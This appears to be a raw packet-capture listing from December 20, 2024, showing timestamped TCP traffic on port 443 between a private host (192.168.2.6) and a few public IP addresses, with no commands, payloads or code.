                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.269290924 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.270665884 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.583530903 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.583961964 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.584094048 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.584328890 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.584427118 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.864634037 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.864748955 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.181185007 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.182164907 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.185347080 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.209361076 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.209625006 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.354362965 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.354413033 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.354429007 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.354518890 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.355333090 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.356462955 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.362382889 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.498950005 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.669862986 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.670460939 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.670475006 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.670486927 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.670639038 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.670825958 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.675425053 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.984339952 CET44363530162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.018402100 CET63530443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.944797039 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.966182947 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.966300011 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.969595909 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.248874903 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.279331923 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.281275034 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.290357113 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.290374994 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.290400028 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.290801048 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.864589930 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.903486967 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.029983997 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.044503927 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.044558048 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.044569969 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.044604063 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.044946909 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.046845913 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.046972036 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.047282934 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.047389030 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.047404051 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.047425985 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.062628031 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.063482046 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.063540936 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.063555002 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.063595057 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.063803911 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.822427034 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.831825972 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.833067894 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.838738918 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.848025084 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.848232985 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.855416059 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.864772081 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.864981890 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.872457027 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.880990982 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.881192923 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.890003920 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.902842045 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.908685923 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.908705950 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.915184975 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.920185089 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.923306942 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.933711052 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.933891058 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.944161892 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.946285009 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.946541071 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.954067945 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.964371920 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.964582920 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.968733072 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.976409912 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.977262020 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.986712933 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.991895914 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.992185116 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.996294975 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:47.999418974 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.002721071 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.003150940 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.011595011 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.011739969 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.011912107 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.016840935 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.016963959 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.017019033 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.021483898 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.021677971 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.027628899 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.027839899 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.028103113 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.028625965 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.031837940 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.032018900 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.035368919 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.038527966 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.038760900 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.041426897 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.053423882 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.053580999 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.053596020 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.053623915 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.053693056 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.054666042 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.057914019 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.061583996 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.063832998 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.068217039 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.074007988 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.074229002 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.079998970 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.080185890 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.080398083 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.085455894 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.085536957 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.092446089 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.092515945 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.092523098 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.095894098 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.098583937 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.104798079 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.105092049 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:48.987194061 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.060394049 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.060411930 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.060513020 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.060524940 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.060537100 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.061096907 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.061300993 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.061373949 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.302851915 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.496001005 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.626027107 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.626502991 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.627346039 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.627660990 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.637058020 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.941160917 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.941625118 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.942131042 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.942328930 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.942667961 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.942881107 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.942928076 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.945628881 CET44361356172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.948890924 CET61356443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.951531887 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.958750963 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.958827972 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.958837986 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.958853960 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.959119081 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.961122036 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:49.985853910 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.277261019 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.306117058 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.306418896 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.374270916 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.374681950 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.376496077 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.378278017 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.379796982 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.382716894 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.408396006 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.504831076 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.505832911 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.507112026 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.514753103 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.670909882 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.671370983 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.671457052 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.718028069 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.819961071 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.819977999 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.829140902 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.829428911 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.829760075 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830179930 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830195904 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830212116 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830276966 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830326080 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830342054 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830358982 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830519915 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830535889 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830565929 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830581903 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830598116 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830615044 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830631971 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830784082 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830866098 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830882072 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.830898046 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.841082096 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.841447115 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.841463089 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.841479063 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.841509104 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.989619970 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.989633083 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.990098000 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.999186039 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.999646902 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.999718904 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.999736071 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.999826908 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:50.999885082 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.000093937 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.000124931 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.000138998 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.000180960 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.003694057 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.004281998 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.004300117 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.004318953 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.004348040 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.004415035 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.004434109 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.004451036 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.004565954 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.004582882 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.004637003 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.004661083 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.005824089 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.025636911 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.025686026 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.025702953 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.025819063 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.025834084 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.027560949 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.029181957 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.029311895 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.157258987 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.183959007 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.189856052 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.190130949 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.190388918 CET4436501423.209.72.43192.168.2.6
